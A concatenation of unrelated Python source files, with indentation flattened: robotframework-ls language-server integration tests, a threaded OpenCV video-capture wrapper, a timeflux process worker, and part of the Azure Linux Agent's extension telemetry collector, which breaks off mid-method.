check = next(iter(result))
check_find_definition_data_regression(
data_regression, check, basename="test_find_definition_keywords"
)
def test_signature_help_integrated(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
from robocorp_ls_core.workspace import Document
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
txt = """
*** Test Cases ***
Log It
Log """
doc = Document("", txt)
language_server.open_doc(uri, 1, txt)
line, col = doc.get_last_line_col()
ret = language_server.request_signature_help(uri, line, col)
result = ret["result"]
signatures = result["signatures"]
# Don't check the signature documentation in the data regression so that the
# test doesn't become brittle.
docs = signatures[0].pop("documentation")
assert docs["kind"] == MarkupKind.Markdown
assert "Log" in docs["value"]
data_regression.check(result)
def test_hover_integrated(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
from robocorp_ls_core.workspace import Document
from robocorp_ls_core.lsp import HoverTypedDict
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
txt = """
*** Test Cases ***
Log It
Log """
doc = Document("", txt)
language_server.open_doc(uri, 1, txt)
line, col = doc.get_last_line_col()
ret = language_server.request_hover(uri, line, col)
result: HoverTypedDict = ret["result"]
contents = result["contents"]
assert "Log" in contents["value"]
assert contents["kind"] == "markdown"
def test_document_highlight_integrated(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
from robocorp_ls_core.workspace import Document
from robocorp_ls_core.lsp import DocumentHighlightResponseTypedDict
from robocorp_ls_core.lsp import DocumentHighlightTypedDict
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
txt = """
*** Test Cases ***
Log It
Log Something
log Else
"""
doc = Document("", txt)
language_server.open_doc(uri, 1, txt)
line, col = doc.get_last_line_col()
line -= 1
ret: DocumentHighlightResponseTypedDict = (
language_server.request_text_document_highlight(uri, line, col)
)
result: DocumentHighlightTypedDict = ret["result"]
assert len(result) == 2
data_regression.check(result)
def test_workspace_symbols_integrated(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
ret = language_server.request_workspace_symbols()
result = ret["result"]
assert len(result) > 0
def test_folding_range_integrated(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
txt = """
*** Test Cases ***
Log It
Log
Log It2
Log
"""
language_server.open_doc(uri, 1, txt)
ret = language_server.request_folding_range(uri)
result = ret["result"]
data_regression.check(result)
def test_code_lens_integrated(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
from robocorp_ls_core import uris
from robotframework_ls_tests.fixtures import check_code_lens_data_regression
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
os.makedirs(ws_root_path, exist_ok=True)
uri = uris.from_fs_path(os.path.join(ws_root_path, "my.robot"))
txt = """
*** Test Case ***
Log It
Log
*** Task ***
Log It2
Log
"""
language_server.open_doc(uri, 1, txt)
ret = language_server.request_code_lens(uri)
found = ret["result"]
check_code_lens_data_regression(data_regression, found)
def test_code_lens_integrated_suites(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
from robocorp_ls_core import uris
from robotframework_ls_tests.fixtures import check_code_lens_data_regression
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
os.makedirs(ws_root_path, exist_ok=True)
uri = uris.from_fs_path(os.path.join(ws_root_path, "my.robot"))
txt = """
*** Task ***
Log It
Log
Log It2
Log
"""
language_server.open_doc(uri, 1, txt)
ret = language_server.request_code_lens(uri)
found = ret["result"]
check_code_lens_data_regression(data_regression, found)
def test_list_tests_integrated(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
txt = """
*** Test Case ***
Log It
Log
*** Task ***
Log It2
Log
"""
language_server.open_doc(uri, 1, txt)
ret = language_server.execute_command("robot.listTests", [{"uri": uri}])
found = ret["result"]
data_regression.check(found)
def test_document_symbol_integrated(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
txt = """
*** Task ***
Log It
Log
Log It2
Log
"""
language_server.open_doc(uri, 1, txt)
ret = language_server.request_document_symbol(uri)
found = ret["result"]
data_regression.check(found)
def test_shadowing_libraries(language_server_io: ILanguageServerClient, workspace_dir):
from robocorp_ls_core import uris
from pathlib import Path
from robocorp_ls_core.unittest_tools.fixtures import TIMEOUT
language_server = language_server_io
os.makedirs(workspace_dir, exist_ok=True)
builtin_lib = Path(workspace_dir) / "builtin.py"
case1_lib = Path(workspace_dir) / "case1.robot"
case2_lib = Path(workspace_dir) / "case2.robot"
builtin_lib.write_text(
"""
def something():
pass
"""
)
case1_lib.write_text(
"""
*** Settings ***
Library builtin
*** Test Cases ***
User can call builtin
Something
"""
)
case2_lib.write_text(
"""
*** Test Cases ***
User can call builtin 2
Log Task executed
"""
)
language_server.initialize(workspace_dir, process_id=os.getpid())
uri1 = uris.from_fs_path(str(case1_lib))
uri2 = uris.from_fs_path(str(case2_lib))
for _i in range(2):
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "textDocument/publishDiagnostics"}
)
language_server.open_doc(uri1, 1, text=None)
assert message_matcher.event.wait(TIMEOUT)
assert message_matcher.msg["params"]["uri"] == uri1
assert message_matcher.msg["params"]["diagnostics"] == []
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "textDocument/publishDiagnostics"}
)
language_server.open_doc(uri2, 1, text=None)
assert message_matcher.event.wait(TIMEOUT)
assert message_matcher.msg["params"]["uri"] == uri2
assert message_matcher.msg["params"]["diagnostics"] == []
language_server.close_doc(uri2)
language_server.close_doc(uri1)
class _RfInterpreterInfo:
def __init__(self, interpreter_id: int, uri: str):
self.interpreter_id = interpreter_id
self.uri = uri
@pytest.fixture
def rf_interpreter_startup(language_server_io: ILanguageServerClient, ws_root_path):
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_START
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_STOP
from robocorp_ls_core import uris
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
os.makedirs(ws_root_path, exist_ok=True)
uri = uris.from_fs_path(os.path.join(ws_root_path, "my.robot"))
ret1 = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_START, [{"uri": uri}]
)
assert ret1["result"] == {
"success": True,
"message": None,
"result": {"interpreter_id": 0},
}
yield _RfInterpreterInfo(interpreter_id=0, uri=uri)
# Note: success could be False if it was stopped in the test...
language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_STOP, [{"interpreter_id": 0}]
)
def test_rf_interactive_integrated_basic(
language_server_io: ILanguageServerClient,
rf_interpreter_startup: _RfInterpreterInfo,
):
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_START
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_STOP
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_SEMANTIC_TOKENS
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS
from robocorp_ls_core.lsp import Position
language_server = language_server_io
uri = rf_interpreter_startup.uri
ret2 = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_START, [{"uri": uri}]
)
assert ret2["result"] == {
"success": True,
"message": None,
"result": {"interpreter_id": 1},
}
stop1 = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_STOP, [{"interpreter_id": 0}]
)
assert stop1["result"] == {"success": True, "message": None, "result": None}
stop_inexistant = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_STOP, [{"interpreter_id": 22}]
)
assert stop_inexistant["result"] == {
"success": False,
"message": "Did not find interpreter with id: 22",
"result": None,
}
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "interpreter/output"}
)
eval2 = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE,
[
{
"interpreter_id": 1,
"code": """
*** Task ***
Some task
Log Something console=True
""",
}
],
)
assert eval2["result"] == {"success": True, "message": None, "result": None}
assert message_matcher.event.wait(10)
assert message_matcher.msg == {
"jsonrpc": "2.0",
"method": "interpreter/output",
"params": {"output": "Something\n", "category": "stdout", "interpreter_id": 1},
}
semantic_tokens = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_SEMANTIC_TOKENS,
[{"interpreter_id": 1, "code": "Log Something console=True"}],
)
data = semantic_tokens["result"]["data"]
assert data == [
0,
0,
3,
7,
0,
0,
7,
9,
12,
0,
0,
14,
7,
11,
0,
0,
7,
1,
6,
0,
0,
1,
4,
12,
0,
]
completions = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS,
[{"interpreter_id": 1, "code": "Lo", "position": Position(0, 2).to_dict()}],
)
for completion in completions["result"]["suggestions"]:
if completion["label"] == "Log (BuiltIn)":
break
else:
raise AssertionError('Did not find "Log" in the suggestions.')
stop2 = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_STOP, [{"interpreter_id": 1}]
)
assert stop2["result"] == {"success": True, "message": None, "result": None}
def test_rf_interactive_integrated_input_request(
language_server_io: ILanguageServerClient,
rf_interpreter_startup: _RfInterpreterInfo,
):
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE
from robocorp_ls_core import uris
language_server = language_server_io
uri = rf_interpreter_startup.uri
robot_file = uris.to_fs_path(uri)
lib_file = os.path.join(os.path.dirname(robot_file), "my_lib.py")
with open(lib_file, "w", encoding="utf-8") as stream:
stream.write(
r"""
def check_input():
import sys
sys.__stdout__.write('Enter something\n')
return input()
"""
)
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "interpreter/output"}
)
language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE,
[{"interpreter_id": 0, "code": "*** Settings ***\nLibrary ./my_lib.py"}],
)
def run_in_thread():
language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE,
[
{
"interpreter_id": 0,
"code": """
*** Test Case ***
Test
${var}= Check Input
Log ${var} console=True
""",
}
],
)
t = threading.Thread(target=run_in_thread)
t.start()
assert message_matcher.event.wait(10)
assert message_matcher.msg == {
"jsonrpc": "2.0",
"method": "interpreter/output",
"params": {
"output": "Enter something\n",
"category": "stdout",
"interpreter_id": 0,
},
}
import time
time.sleep(0.5)
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "interpreter/output"}
)
language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE,
[{"interpreter_id": 0, "code": "EnterThis"}],
)
assert message_matcher.event.wait(10)
assert message_matcher.msg == {
"jsonrpc": "2.0",
"method": "interpreter/output",
"params": {"output": "EnterThis\n", "category": "stdout", "interpreter_id": 0},
}
t.join(10)
assert not t.is_alive()
def test_rf_interactive_integrated_hook_robocorp_update_env(
language_server_io: ILanguageServerClient, cases: CasesFixture, workspace_dir: str
):
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE
from robocorp_ls_core import uris
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_START
language_server = language_server_io
cases.copy_to("custom_env", workspace_dir)
p = Path(workspace_dir)
plugins_path = p / "plugins"
assert plugins_path.exists()
language_server.initialize(
workspace_dir,
process_id=os.getpid(),
initialization_options={"pluginsDir": str(plugins_path)},
)
p = Path(workspace_dir) / "env1" / "caselib1.robot"
assert p.exists()
uri = uris.from_fs_path(str(p))
handled_update_launch_env = threading.Event()
def handle_execute_workspace_command(method, message_id, params):
assert method == "$/executeWorkspaceCommand"
assert isinstance(params, dict)
command = params["command"]
assert command == "robocorp.updateLaunchEnv"
arguments = params["arguments"]
assert arguments["targetRobot"]
env = arguments["env"]
env["CUSTOM_VAR_SET_FROM_TEST"] = "EXPECTED VALUE"
contents = {"jsonrpc": "2.0", "id": message_id, "result": env}
language_server.write(contents)
handled_update_launch_env.set()
return True
language_server.register_request_handler(
"$/executeWorkspaceCommand", handle_execute_workspace_command
)
ret1 = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_START, [{"uri": uri}]
)
assert handled_update_launch_env.wait(5)
try:
assert ret1["result"] == {
"success": True,
"message": None,
"result": {"interpreter_id": 0},
}
message_matcher_interpreter_output = (
language_server.obtain_pattern_message_matcher(
{"method": "interpreter/output"}
)
)
def run_in_thread():
language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE,
[
{
"interpreter_id": 0,
"code": """
*** Test Case ***
Test
Log to console %{CUSTOM_VAR_SET_FROM_TEST}
""",
}
],
)
t = threading.Thread(target=run_in_thread)
t.start()
assert message_matcher_interpreter_output.event.wait(10)
assert message_matcher_interpreter_output.msg == {
"jsonrpc": "2.0",
"method": "interpreter/output",
"params": {
"output": "EXPECTED VALUE\n",
"category": "stdout",
"interpreter_id": 0,
},
}
finally:
# Note: success could be False if it was stopped in the test...
language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_STOP, [{"interpreter_id": 0}]
)
def test_rf_interactive_integrated_completions(
language_server_io: ILanguageServerClient,
rf_interpreter_startup: _RfInterpreterInfo,
):
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS
from robocorp_ls_core.lsp import Position
language_server = language_server_io
completions = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS,
[
{
"interpreter_id": rf_interpreter_startup.interpreter_id,
"code": "\n\nLo",
"position": Position(2, 2).to_dict(),
}
],
)
for completion in completions["result"]["suggestions"]:
if completion["label"] == "Log (BuiltIn)":
assert completion.pop("documentation").startswith("**Log(")
assert completion == {
"label": "Log (BuiltIn)",
"kind": 0,
"insertText": "Log ${1:message}",
"insertTextRules": 4,
"range": {
"start": {"line": 5, "character": 4},
"end": {"line": 5, "character": 6},
"startLineNumber": 3,
"startColumn": 1,
"endLineNumber": 3,
"endColumn": 3,
},
"preselect": False,
}
break
else:
raise AssertionError('Did not find "Log" in the suggestions.')
def test_rf_interactive_integrated_completions_not_duplicated(
language_server_io: ILanguageServerClient,
rf_interpreter_startup: _RfInterpreterInfo,
):
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS
from robocorp_ls_core.lsp import Position
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE
language_server = language_server_io
eval2 = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_EVALUATE,
[
{
"interpreter_id": rf_interpreter_startup.interpreter_id,
"code": """
*** Keyword ***
Mykeywordentered
Log Something console=True
*** Keyword ***
Mykeywordentered
Log Something console=True
""",
}
],
)
assert eval2["result"] == {"success": True, "message": None, "result": None}
completions = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS,
[
{
"interpreter_id": rf_interpreter_startup.interpreter_id,
"code": "\n\nMykeyworde",
"position": Position(2, 2).to_dict(),
}
],
)
assert len(completions["result"]["suggestions"]) == 1
def test_rf_interactive_integrated_fs_completions(
language_server_io: ILanguageServerClient,
rf_interpreter_startup: _RfInterpreterInfo,
data_regression,
):
from robocorp_ls_core import uris
from robocorp_ls_core.workspace import Document
# Check that we're able to get completions based on the current dir.
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS
from robocorp_ls_core.lsp import Position
uri = rf_interpreter_startup.uri
fs_path = uris.to_fs_path(uri)
dirname = os.path.dirname(fs_path)
with open(os.path.join(dirname, "my_lib_03.py"), "w") as stream:
stream.write(
"""
def some_method():
pass
"""
)
language_server = language_server_io
code = "*** Settings ***\nLibrary ./my_"
doc = Document(uri, code)
completions = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS,
[
{
"interpreter_id": rf_interpreter_startup.interpreter_id,
"code": code,
"position": Position(*doc.get_last_line_col()).to_dict(),
}
],
)
suggestions = completions["result"]["suggestions"]
assert suggestions
data_regression.check(suggestions)
def test_rf_interactive_integrated_auto_import_completions(
language_server_io: ILanguageServerClient,
rf_interpreter_startup: _RfInterpreterInfo,
data_regression,
):
from robocorp_ls_core.workspace import Document
from robotframework_ls_tests.fixtures import check_code_lens_data_regression
# Check that we're able to get completions based on the current dir.
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS
from robocorp_ls_core.lsp import Position
uri = rf_interpreter_startup.uri
language_server = language_server_io
code = "append to lis"
doc = Document(uri, code)
completions = language_server.execute_command(
ROBOT_INTERNAL_RFINTERACTIVE_COMPLETIONS,
[
{
"interpreter_id": rf_interpreter_startup.interpreter_id,
"code": code,
"position": Position(*doc.get_last_line_col()).to_dict(),
}
],
)
suggestions = completions["result"]["suggestions"]
assert suggestions
assert "Adds values to the end of list" in suggestions[0]["documentation"]
suggestions[0]["documentation"] = "<replaced_for_test>"
check_code_lens_data_regression(data_regression, suggestions)
def test_code_lens_integrated_rf_interactive(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
from robocorp_ls_core import uris
from robotframework_ls_tests.fixtures import check_code_lens_data_regression
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
uri_untitled = "~untitled"
txt = """
*** Task ***
Log It
Log
"""
language_server.open_doc(uri_untitled, 1, txt)
ret = language_server.request_code_lens(uri_untitled)
found = ret["result"]
assert not found # when unable to resolve path, we can't create it.
os.makedirs(ws_root_path, exist_ok=True)
uri = uris.from_fs_path(os.path.join(ws_root_path, "my.robot"))
txt = """
*** Task ***
Log It
Log
"""
language_server.open_doc(uri, 1, txt)
ret = language_server.request_code_lens(uri)
found = ret["result"]
for code_lens in found:
if code_lens.get("data", {}).get("type") == "rf_interactive":
break
else:
raise AssertionError(f"Unable to find 'rf_interactive' code lens in: {ret}")
check_code_lens_data_regression(
data_regression, [code_lens], basename="code_lens_before_resolve"
)
ret = language_server.request_resolve_code_lens(code_lens)
resolved_code_lens = ret["result"]
check_code_lens_data_regression(
data_regression, [resolved_code_lens], basename="code_lens_after_resolve"
)
def test_get_rfls_home_dir(language_server_io: ILanguageServerClient):
assert language_server_io.execute_command("robot.getRFLSHomeDir", [])[
"result"
].endswith(".robotframework-ls")
|
good_videocapture.py
|
import time
import threading
import cv2
class GoodVideoCpature(cv2.VideoCapture):
def __init__(self, url, timeout = 3, *args, **kwargs):
super(GoodVideoCpature, self).__init__(url, *args, **kwargs)
self.frame_receiver = None
self.timeout = timeout
self._result = (None, None)
self._reading = False
@staticmethod
def create(url):
rtscap = GoodVideoCpature(url)
rtscap.frame_receiver = threading.Thread(target=rtscap.recv_frame)
rtscap.frame_receiver.daemon = True
return rtscap
def is_started(self):
ok = self.isOpened()
if ok and self._reading:
ok = self.frame_receiver.is_alive()
return ok
def get_status(self):
return self._reading
def recv_frame(self):
while self.isOpened():
if not self._reading:
return
self._result = self.read()
self._reading = False
def read_latest_frame(self):
start_time = time.time()
while not self._result[0] \
and (time.time() - start_time) <= self.timeout:
pass
return self._result
def start_read(self):
self._reading = True
self.frame_receiver.start()
def stop_read(self):
self._reading = False
if self.frame_receiver.is_alive():
self.frame_receiver.join()
|
worker.py
|
"""timeflux.core.worker: spawn processes."""
import importlib
import logging
import signal
from multiprocessing import Process
from timeflux.core.logging import get_queue, init_worker
from timeflux.core.graph import Graph
from timeflux.core.scheduler import Scheduler
from timeflux.core.registry import Registry
from timeflux.core.exceptions import *
class Worker:
"""Spawn a process and launch a scheduler."""
def __init__(self, graph):
self._graph = graph
def run(self):
"""Run the process"""
p = Process(target=self._run, args=(get_queue(),), name=self._graph['id'])
p.start()
return p
def load(self):
# Build the graph and compute the traversal path
g = Graph(self._graph)
graph = g.build()
path = g.traverse()
# Set rate
Registry.rate = self._graph['rate']
# Load nodes
nodes = {}
for step in path:
node = self._load_node(graph.nodes[step['node']], step['node'])
nodes[step['node']] = node
return path, nodes
def _run(self, log_queue=None):
# Initialize logging
if log_queue:
init_worker(log_queue)
logger = logging.getLogger(__name__)
scheduler = None
try:
# Initialize the graph and instantiate the nodes
path, nodes = self.load()
# Launch scheduler and run it
scheduler = Scheduler(path, nodes, self._graph['rate'])
scheduler.run()
except KeyboardInterrupt:
# Ignore further interrupts
signal.signal(signal.SIGINT, signal.SIG_IGN)
logger.debug('Interrupting')
except (GraphDuplicateNode, GraphUndefinedNode, WorkerLoadError, ValidationError) as error:
logger.error(error)
except WorkerInterrupt as error:
logger.debug(error)
except Exception as error:
logger.exception(error)
if scheduler is not None:
logger.info('Terminating')
scheduler.terminate()
def _load_node(self, node, nid):
"""Import a module and instantiate class."""
# Import module
try:
m = importlib.import_module(node['module'])
except ModuleNotFoundError as error:
if node['module'] in error.msg:
# Missing or invalid node
raise WorkerLoadError(f"Node '{nid}': no module named '{node['module']}'")
else:
# Missing or invalid dependency
raise error
# Get class
try:
c = getattr(m, node['class'])
except AttributeError:
raise WorkerLoadError(f"Node '{nid}': no class named '{node['class']}' in module '{node['module']}'")
# Instantiate class
try:
n = c(**node['params'])
except TypeError as error:
raise WorkerLoadError(f"Node '{nid}': {error}")
return n
|
collect_telemetry_events.py
|
# Microsoft Azure Linux Agent
#
# Copyright 2020 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import json
import os
import re
import threading
from collections import defaultdict
import azurelinuxagent.common.logger as logger
from azurelinuxagent.common import conf
from azurelinuxagent.common.agent_supported_feature import get_supported_feature_by_name, SupportedFeatureNames
from azurelinuxagent.common.event import EVENTS_DIRECTORY, TELEMETRY_LOG_EVENT_ID, \
TELEMETRY_LOG_PROVIDER_ID, add_event, WALAEventOperation, add_log_event, get_event_logger, \
CollectOrReportEventDebugInfo, EVENT_FILE_REGEX, parse_event
from azurelinuxagent.common.exception import InvalidExtensionEventError, ServiceStoppedError
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.interfaces import ThreadHandlerInterface
from azurelinuxagent.common.telemetryevent import TelemetryEvent, TelemetryEventParam, \
GuestAgentGenericLogsSchema, GuestAgentExtensionEventsSchema
from azurelinuxagent.common.utils import textutil
from azurelinuxagent.ga.exthandlers import HANDLER_NAME_PATTERN
from azurelinuxagent.ga.periodic_operation import PeriodicOperation
def get_collect_telemetry_events_handler(send_telemetry_events_handler):
return CollectTelemetryEventsHandler(send_telemetry_events_handler)
class ExtensionEventSchema(object):
"""
Class for defining the schema for Extension Events.
Sample Extension Event Example:
{
"Version":"1.0.0.23",
"Timestamp":"2018-01-02T22:08:12.510696Z" //(time in UTC (ISO-8601 standard),
"TaskName":"TestRun" //Open for publishers,
"EventLevel":"Critical/Error/Warning/Verbose/Informational/LogAlways",
"Message": "Successful test" //(max 3K, 3072 characters),
"EventPid":"1",
"EventTid":"2",
"OperationId":"Guid (str)"
}
"""
Version = "Version"
Timestamp = "Timestamp"
TaskName = "TaskName"
EventLevel = "EventLevel"
Message = "Message"
EventPid = "EventPid"
EventTid = "EventTid"
OperationId = "OperationId"
class _ProcessExtensionEvents(PeriodicOperation):
"""
Periodic operation for collecting extension telemetry events and enqueueing them for the SendTelemetryHandler thread.
"""
_EXTENSION_EVENT_COLLECTION_PERIOD = datetime.timedelta(seconds=conf.get_etp_collection_period())
_EXTENSION_EVENT_FILE_NAME_REGEX = re.compile(r"^(\d+)\.json$", re.IGNORECASE)
# Limits
_MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD = 300
_EXTENSION_EVENT_FILE_MAX_SIZE = 4 * 1024 * 1024 # 4 MB = 4 * 1,048,576 Bytes
_EXTENSION_EVENT_MAX_SIZE = 1024 * 6 # 6Kb or 6144 characters. Limit for the whole event. Prevent oversized events.
_EXTENSION_EVENT_MAX_MSG_LEN = 1024 * 3 # 3Kb or 3072 chars.
_EXTENSION_EVENT_REQUIRED_FIELDS = [attr.lower() for attr in dir(ExtensionEventSchema) if
not callable(getattr(ExtensionEventSchema, attr)) and not attr.startswith("__")]
def __init__(self, send_telemetry_events_handler):
super(_ProcessExtensionEvents, self).__init__(_ProcessExtensionEvents._EXTENSION_EVENT_COLLECTION_PERIOD)
self._send_telemetry_events_handler = send_telemetry_events_handler
def _operation(self):
if self._send_telemetry_events_handler.stopped():
logger.warn("{0} service is not running, skipping current iteration".format(
self._send_telemetry_events_handler.get_thread_name()))
return
delete_all_event_files = True
extension_handler_with_event_dirs = []
try:
extension_handler_with_event_dirs = self._get_extension_events_dir_with_handler_name(conf.get_ext_log_dir())
if not extension_handler_with_event_dirs:
logger.verbose("No Extension events directory exist")
return
for extension_handler_with_event_dir in extension_handler_with_event_dirs:
handler_name = extension_handler_with_event_dir[0]
handler_event_dir_path = extension_handler_with_event_dir[1]
self._capture_extension_events(handler_name, handler_event_dir_path)
except ServiceStoppedError:
# Since the service stopped, we should not delete the extension files and retry sending them whenever
# the telemetry service comes back up
delete_all_event_files = False
except Exception as error:
msg = "Unknown error occurred when trying to collect extension events:{0}".format(
textutil.format_exception(error))
add_event(op=WALAEventOperation.ExtensionTelemetryEventProcessing, message=msg, is_success=False)
finally:
# Always ensure that the events directory are being deleted each run except when Telemetry Service is stopped,
# even if we run into an error and dont process them this run.
if delete_all_event_files:
self._ensure_all_events_directories_empty(extension_handler_with_event_dirs)
@staticmethod
def _get_extension_events_dir_with_handler_name(extension_log_dir):
"""
Get the full path to events directory for all extension handlers that have one
:param extension_log_dir: Base log directory for all extensions
:return: A list of full paths of existing events directory for all handlers
"""
extension_handler_with_event_dirs = []
for ext_handler_name in os.listdir(extension_log_dir):
# Check if its an Extension directory
if not os.path.isdir(os.path.join(extension_log_dir, ext_handler_name)) \
or re.match(HANDLER_NAME_PATTERN, ext_handler_name) is None:
continue
# Check if EVENTS_DIRECTORY directory exists
extension_event_dir = os.path.join(extension_log_dir, ext_handler_name, EVENTS_DIRECTORY)
if os.path.exists(extension_event_dir):
extension_handler_with_event_dirs.append((ext_handler_name, extension_event_dir))
return extension_handler_with_event_dirs
def _event_file_size_allowed(self, event_file_path):
event_file_size = os.stat(event_file_path).st_size
if event_file_size > self._EXTENSION_EVENT_FILE_MAX_SIZE:
convert_to_mb = lambda x: (1.0 * x) / (1000 * 1000)
msg = "Skipping file: {0} as its size is {1:.2f} Mb > Max size allowed {2:.1f} Mb".format(
event_file_path, convert_to_mb(event_file_size),
convert_to_mb(self._EXTENSION_EVENT_FILE_MAX_SIZE))
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
return False
return True
def _capture_extension_events(self, handler_name, handler_event_dir_path):
"""
Capture Extension events and add them to the events_list
:param handler_name: Complete Handler Name. Eg: Microsoft.CPlat.Core.RunCommandLinux
:param handler_event_dir_path: Full path. Eg: '/var/log/azure/Microsoft.CPlat.Core.RunCommandLinux/events'
"""
# Filter out the files that do not follow the pre-defined EXTENSION_EVENT_FILE_NAME_REGEX
event_files = [event_file for event_file in os.listdir(handler_event_dir_path) if
re.match(self._EXTENSION_EVENT_FILE_NAME_REGEX, event_file) is not None]
# Pick the latest files first, we'll discard older events if len(events) > MAX_EVENT_COUNT
event_files.sort(reverse=True)
captured_extension_events_count = 0
dropped_events_with_error_count = defaultdict(int)
try:
for event_file in event_files:
event_file_path = os.path.join(handler_event_dir_path, event_file)
try:
logger.verbose("Processing event file: {0}", event_file_path)
if not self._event_file_size_allowed(event_file_path):
continue
# We support multiple events in a file, read the file and parse events.
captured_extension_events_count = self._enqueue_events_and_get_count(handler_name, event_file_path,
captured_extension_events_count,
dropped_events_with_error_count)
# We only allow MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD=300 maximum events per period per handler
if captured_extension_events_count >= self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD:
msg = "Reached max count for the extension: {0}; Max Limit: {1}. Skipping the rest.".format(
handler_name, self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD)
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
break
except ServiceStoppedError:
# Not logging here as already logged once, re-raising
# Since we already started processing this file, deleting it as we could've already sent some events out
# This is a trade-off between data replication vs data loss.
raise
except Exception as error:
msg = "Failed to process event file {0}:{1}".format(event_file,
textutil.format_exception(error))
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
finally:
# Todo: We should delete files after ensuring that we sent the data to Wireserver successfully
# from our end rather than deleting first and sending later. This is to ensure the data reliability
# of the agent telemetry pipeline.
os.remove(event_file_path)
finally:
if dropped_events_with_error_count:
msg = "Dropped events for Extension: {0}; Details:\n\t{1}".format(handler_name, '\n\t'.join(
["Reason: {0}; Dropped Count: {1}".format(k, v) for k, v in dropped_events_with_error_count.items()]))
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
if captured_extension_events_count > 0:
logger.info("Collected {0} events for extension: {1}".format(captured_extension_events_count, handler_name))
@staticmethod
def _ensure_all_events_directories_empty(extension_events_directories):
if not extension_events_directories:
return
for extension_handler_with_event_dir in extension_events_directories:
event_dir_path = extension_handler_with_event_dir[1]
